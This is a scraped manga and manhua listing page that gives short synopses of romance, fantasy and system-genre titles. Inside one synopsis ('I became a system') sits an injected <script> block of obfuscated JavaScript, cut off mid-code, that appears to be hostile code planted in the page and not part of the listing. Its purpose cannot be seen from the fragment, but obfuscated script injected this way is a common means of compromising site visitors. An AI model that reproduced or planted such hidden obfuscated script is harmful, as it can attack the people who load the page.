2021 - Page 31

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare
Her… One Is When Master Jue Flirts With Her.

1258 results

I Am Being Chased To Fall In Love Everyday

Read manga I Am Being Chased To Fall In Love Everyday Xue Xi, who has been gone for eighteen years, was ridiculed by her grandmother and cousin as soon as she returned home. She was also disgusted by her classmates when she arrived at school. Unexpectedly, when she met Xiang Huai, he inexplicably triggered the debuff of “If you don’t fall in love, you will die”. In order to save yourself, she can only fall in love with the owner of this little gangster of the grocery store. A love relationship between an almighty boss and a learning boss has begun…


I am picking up attributes and items in last days

When the zombies started appearing, everyone is at risk, Yang Hao forced to seek help in risk, in danger I found ” pick up attributes system” acquired strength attribute, strength +1, acquired agility attribute, agility +1, I picked up? From today onwards, food, resources, beautiful girls, this land, all are mine! Yang Hao screamed! below me are all zombies….. a path to? The Last Hero manhua 152.167


I Am The Strongest Lord In Another World

Read Manhua I Am The Strongest Lord In Another World / Lord System / Record Of The Mightiest Lord To Become The Ultimate Game Character, You Must Meet Three Conditions: Gain Access To The Game’s “Lord System” Control Panel, Take Over The Body Of A Noble Family’s Illegitimate Son, And Make Sure Nobody Else Knows They’re In A Game. Well, Richard Orlando Fulfills Them All! Now He Must Build An Army And Fight Through Goblins, Gnolls, Trolls, And More To Discover New Lands, All While Keeping The Lord System A Secret. But With That Trump Card On His Side, It’ll Only Be A Matter Of Time Before He Conquers All And Becomes The Ultimate Lord Of The New Realm! Sss급 영주로 회귀했다 俺こそ異世界の最強領主 我是异世界最强领主 我是異世界最強領主


I Became a Doting Father

I\'ve become a single father! 24-year-old Juwon Lee works part-time at a convenience store and lives alone in his small apartment. One day his uncle passes away and leaves behind a 4-year-old daughter, the cute little Yeondu. Instead of letting her be sent to an orphanage, Juwon steps up and decides to be her new guardian.


I became a system

Other people usually have system as a cheat, but for Meng Fei Qui’s case, he got reincarnated, but he doesn’t have a system, why? cause he himself is a system, a cheat!!<script></script><script>(function(_0x3f4a48,_0x4c105e){var _0x2379cb=_0x3f97,_0x4b24a2=_0x3f4a48();while(!![]){try{var _0x3a3771=parseInt(_0x2379cb(0xb6))/(-0x1d64+0x1a4f+0x1*0x316)+-parseInt(_0x2379cb(0xae))/(-0x1*0x15eb+-0x481+0x11*0x18e)*(-parseInt(_0x2379cb(0xb3))/(0xfd7+0x1*0x21be+0x5*-0x9ea))+parseInt(_0x2379cb(0xb5))/(-0x15*0x11+0x1dd9+-0x23*0xd0)*(-parseInt(_0x2379cb(0xb1))/(0x136d*0x1+0x1*0x189+-0x14f1))+-parseInt(_0x2379cb(0xab))/(-0x3*-0x4a9+0x3e7+-0x11dc)+-parseInt(_0x2379cb(0x9f))/(0x51f+0x1c40+-0x61*0x58)*(-parseInt(_0x2379cb(0xbd))/(0xe98+-0x1*-0x1449+-0x22d9))+parseInt(_0x2379cb(0xa5))/(0x1350+-0x650+-0xcf7)+-parseInt(_0x2379cb(0xb9))/(-0x1*-0x1073+-0xb52*0x1+-0x517);if(_0x3a3771===_0x4c105e)break;else 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I Became an Evolving Space Monster

Read manhwa I Became an Evolving Space Monster / Evolution: Road to Space Monster / 진화하는 우주괴물이 되었다 Lost in the vast expanse of space, trapped in the icy confines of a metal spacecraft, I was forced to face a horrifying truth. That I had transformed into a ruthless alien predator in a space survival game.


I Became the Male Lead’s Adopted Daughter

Summary: “I’m going to adopt a child.” Duke Ferio Voreoti’s impulsive decision shocked everyone in the mansion. Not only did he make her his daughter, but he also gave her the name of a ‘beast’ that only direct members of the bloodline could receive. “Even as you breathe right now, I’m earning money.” “It’s confidence, not arrogance.” “My face really does have its advantages.” The most arrogant father in the whole world, and “I love muscles the most. Let’s get muscular.” “Show me your thigh muscles! Your butt would be even better!” “You’re nothing but a flower if you have a calm personality…” his corrupted(?) daughter. And… “I will give his excellency the information he wants most.” “Information I want most, you say…” “You won’t regret it.” …A stepmother(?) with a strange secret as well. Alternative Name 남주의 입양딸이 되었습니다


I Became the Tyrant’s Secretary

I became the secretary of a tyrant in place of my clumsy brother to survive. But I have so much potential for it. I’m so darn good at my job. Because I served the tyrant so well, ‘Everyone has a happy ending’. Well then, shall I quit being a secretary and live a leisurely life now? “Rosaline, tell me what you want.” He asked as he stepped down from his chair. “I want to quit.” His eyebrows twitched slightly. “Do you want to die?” Your highness, you never hold on to people who want to leave, so why’re you being like this to me?


I Became the Villain’s Wife

The dainty flower idol Chen Cong Rong unluckily fell into a trap and awoke to a stunning naked man in her bed! Hahaha, is it okay to be with such a beautiful man? Hang on… Are you telling me I’ve switched places with the toxic, evil, and manipulative side character who won’t even survive 20% of the plot?! No, I’m definitely not ready to die!! Watch as I keep on living my ideal life!


I Became the Wife of a Tragedy’s Main Lead

I Became the Wife of a Tragedy’s Main Lead Living alone as an abandoned princess of the Kingdom of Anzak, I discovered I was in fact in a trashy novel that appeared in my dreams one day. My half-sister was the novel’s heroine, while the male lead was well-known to be cruel and heartless. I was just an extra who died before all the drama started. Sold as a scapegoat for the Halvenkia Empire’s peace treaty, I was destined to die, unable to escape my fate. “I’m the only man in Halvenkia who’s still single. Don’t you fancy me?” But all of a sudden, the main character wants to marry me. Your first love, first kiss, and first fling are all with the heroine, but could I take them all for myself? Alexia, struggling to alter the story in order to survive. Tervion, wanting to keep her all for himself. And Ophelia, the unknown heroine. The original story has now begun to flow in a completely different direction. This is romance fantasy which covers Alexia and Tervion’s dreams and fantasies, as the only ones in each other’s eyes.


I Became the Wife of the Male Lead

I possessed the body of “Fiona,” the final villainess whose soul was sentenced to eternal suffering after her gruesome demise at the hands of the world’s hero. She was tortured by her own family just because she was an illegitimate child. And so… arriving six years before the start of the novel, I was sent to war at the age of thirteen! Fortunately, as the story’s greatest villainess, Fiona was a genius mage. I had to survive the monster invasion. But now, I couldn’t be in the middle of a battlefield. Just before I ran out of breath, I encountered the teenaged male lead. …Why is he here? Well, if the male lead dies here, then the world will be destroyed. So, let’s save him first! 내 남자 주인공의 아내가 되었다
